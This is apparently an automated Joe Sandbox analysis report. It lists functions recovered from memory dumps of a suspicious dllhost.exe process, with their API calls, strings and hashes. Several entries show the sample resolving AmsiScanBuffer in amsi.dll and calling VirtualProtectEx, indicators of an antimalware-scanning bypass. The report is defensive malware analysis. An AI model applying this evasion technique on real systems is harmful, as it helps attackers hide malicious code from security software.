Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 7b20e5072ecc76eb2cff13324b271b5b52a1c013dd6addca401b113f6c26aa28
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 51F0306621B70189EF149B24A89D76963A0FB89770F950719DE7F495E4CF3CC4C8C700

Function 00000279A92A3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000279A92A275A), ref: 00000279A92A372A
StrCpyW.SHLWAPI ref: 00000279A92A373A
StrCatW.SHLWAPI ref: 00000279A92A3746
PathCombineW.SHLWAPI(?,?,00000000,00000279A92A275A), ref: 00000279A92A3754

Strings

\\.\pipe\, xrefs: 00000279A92A3720

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 428ade637915c0970fd288fc6add3ff18808db579b56f2ad2e23f7f0871e47c8
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 28F08C69709B8086EB549B13BD1C119A2A0BB48FE0F4A8030EE4F0BB18DE3CC4C58700

Function 00000279A9271E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00000279A9271E47
GetProcAddress.KERNEL32 ref: 00000279A9271E57
Sleep.KERNEL32 ref: 00000279A9271E67

Strings

AmsiScanBuffer, xrefs: 00000279A9271E50
amsi.dll, xrefs: 00000279A9271E40

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 713c524e57f6de6d7974cf58e2f32d6abe6c6834f583fa15143c44a805f97be8
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 6CD0671562B700DEEB09AF11FC9C7543261BFA8B21FC68465CD0E112A1EF2C85D99340

Function 00000279A92A1E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00000279A92A1E47
GetProcAddress.KERNEL32 ref: 00000279A92A1E57
Sleep.KERNEL32 ref: 00000279A92A1E67

Strings

amsi.dll, xrefs: 00000279A92A1E40
AmsiScanBuffer, xrefs: 00000279A92A1E50

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 618579bfee8315ac86624bd30c6a5e58d742de73df773eaa353e62bea960c29e
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: DCD09E1562F700DDFB49AB15EC9C75432A1BFA8B31FC64825CD1F096A1DE3C85D98340

Function 00000279A9275810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A9275896

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: f332c4a0b912405e95993bfbddc4ed58c72e9c92c3b1ca4c70c05a4ccac639d6
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: DE02CB3621EB848AE7A0CB59F49475AF7A0F3C57A4F114015EA8E97BA8DF7CC494CB40

Function 00000279A92A5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A92A5896

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 8b7b29ecfde653e2a4b10100ecc7a39fe1dfd968c6db7a705219b3f124198a02
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 6202C67721EB848AEBA0CB55F49475EB7A1F3C47A4F114015EA8E87BA9DB7CC484CB40

Function 00000279A9272C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000279A9272CAD
TlsGetValue.KERNEL32 ref: 00000279A9272CBC
TlsGetValue.KERNEL32 ref: 00000279A9272CCB
TlsSetValue.KERNEL32 ref: 00000279A9272E0F
TlsSetValue.KERNEL32 ref: 00000279A9272E1E
TlsSetValue.KERNEL32 ref: 00000279A9272E2D

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: c645ce8e3fd995234a99ba4f60b6d1649cff9f6893a5f56e32a63772d950a048
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: CF51D73531A7018FE364DF1AF488A5A73A4F788BA4F524129DD4E53B55DF38C885CB00

Function 00000279A92A2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000279A92A2CAD
TlsGetValue.KERNEL32 ref: 00000279A92A2CBC
TlsGetValue.KERNEL32 ref: 00000279A92A2CCB
TlsSetValue.KERNEL32 ref: 00000279A92A2E0F
TlsSetValue.KERNEL32 ref: 00000279A92A2E1E
TlsSetValue.KERNEL32 ref: 00000279A92A2E2D

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 8fac3616576438d4a371d171cc21054ce729d59a4653c34b582e9d6063f63b08
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: B751C53661EB018FE364DB16E488A5AB3A4F788BA4F524129ED4F43B55DF38C9C5CB00

Function 00000279A9272AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000279A9272AE1
TlsGetValue.KERNEL32 ref: 00000279A9272AF0
TlsGetValue.KERNEL32 ref: 00000279A9272AFF
TlsSetValue.KERNEL32 ref: 00000279A9272C3B
TlsSetValue.KERNEL32 ref: 00000279A9272C4A
TlsSetValue.KERNEL32 ref: 00000279A9272C59

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 70447b91329011702e9d5b61e66da4d143c3854abc66492ed610b5721cbae26e
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 6451C73531A7418FE724CF2AE888B5A73A4F789BA4F525129DE4E53B55DF38C885CB00

Function 00000279A92A2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00000279A92A2AE1
TlsGetValue.KERNEL32 ref: 00000279A92A2AF0
TlsGetValue.KERNEL32 ref: 00000279A92A2AFF
TlsSetValue.KERNEL32 ref: 00000279A92A2C3B
TlsSetValue.KERNEL32 ref: 00000279A92A2C4A
TlsSetValue.KERNEL32 ref: 00000279A92A2C59

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: e5f2bad78e3e0c64387f0d35f648c8eb22aa6f9f7f6c5f1725bfb276e92fad7f
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: CD51B53661A7418FE764CF16E888B1AB3A5F788BA4F524529DE4E43B54DF38C985CB00

Function 00000279A9275E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A9275E66

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 7ab57c4806f8a308aa4bdec5b6d24676d1986f0d371fc485244f0e12989f37ac
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: C261B53652EB84CBEB60CB59E45871AB7A0F388764F110516FE8E57BA8DB7CC580CB01

Function 00000279A92A5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000279A92A5E66

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 7c6f1216dde9188cd47ccb83dec8ef758ab0cff4829f7ea3ae75dec3653f75e1
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: DA61947752EB448AEB60CB55E45875EB7A0F388764F120116FE8E87BA8DB7CC584CB04

Function 00000279A9273EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000279A9273A5B), ref: 00000279A9273EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A9273A5B), ref: 00000279A9273F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A9273A5B), ref: 00000279A9273F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A9273A5B), ref: 00000279A9273F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A9273A5B), ref: 00000279A9273F68

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: eaaf1c3f9098413e96af13e18b36c163efac7514f92c8c77b61d29bf5d674bce
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: F111913661AB4187EB348F21F40860AB7B0FB49BA4F454426DE4D137A4EF7EC984C781

Function 00000279A92A3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000279A92A3A5B), ref: 00000279A92A3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A92A3A5B), ref: 00000279A92A3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A92A3A5B), ref: 00000279A92A3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000279A92A3A5B), ref: 00000279A92A3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000279A92A3A5B), ref: 00000279A92A3F68

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: e402ea35cefb601bed9d4e8627f155cbf3d71ec08f3b7342e724c225c7313386
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: F711422661E740D7EB648B25E40861AA7B0FB49B90F050426EE4D47B94EF7DC994C784

Function 00000279A9278CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A9278CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000279A9278D62
RtlUnwindEx.NTDLL ref: 00000279A9278DBC

Strings

csm, xrefs: 00000279A9278D49

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 8b71f35d19494b33a445c1d17dc364d0c1092fb549f2c54591a07a677fe5de71
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 3A517F3231B7008FEB54DB25E488B6D7792F754BA8F568125EE4E5B788EB79C881C700

Function 00000279A92A8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A92A8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000279A92A8D62
RtlUnwindEx.NTDLL ref: 00000279A92A8DBC

Strings

csm, xrefs: 00000279A92A8D49

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 25be796fe9dfcf1381ddea103d102a7efa3874367b6f83ab676a4bf16a7b9539
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: B0516E3331AB00CEEB54DB25E548B6D7791F754BA8F168125EE5E4BB88DB79C881C700

Function 00000279A9249EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A9249ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000279A9249FBC

Strings

csm, xrefs: 00000279A924A00E
csm, xrefs: 00000279A9249EF6

Memory Dump Source

Source File: 00000025.00000003.1886521218.00000279A9240000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000279A9240000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_279a9240000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 244f54b5bd5363a61610e8202353964cba107cdb462eb8ef2d498c3cf1bf1aca
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 1D517C3624B7808EEB748F22954C35877A0F394BA4F1A9116DE9D4BBD9CB39D8D0CB01

Function 00000279A927AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000279A927AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000279A927ABBC

Strings

csm, xrefs: 00000279A927AAF6
csm, xrefs: 00000279A927AC0E

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 6b164ed33f18a9e0071e6dc65bbd8dc4fbca6aa5312ba561064b5cd3fc369059
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: F0518A3620A7809FEB748F22954835977A5F364BB4F1A511ADE8D67BD5CB38C8D0CB01

Function 00000279A927A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000279A927A75B
_CallSETranslator.LIBVCRUNTIME ref: 00000279A927A7A7

Strings

RCC, xrefs: 00000279A927A777
MOC, xrefs: 00000279A927A76F

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

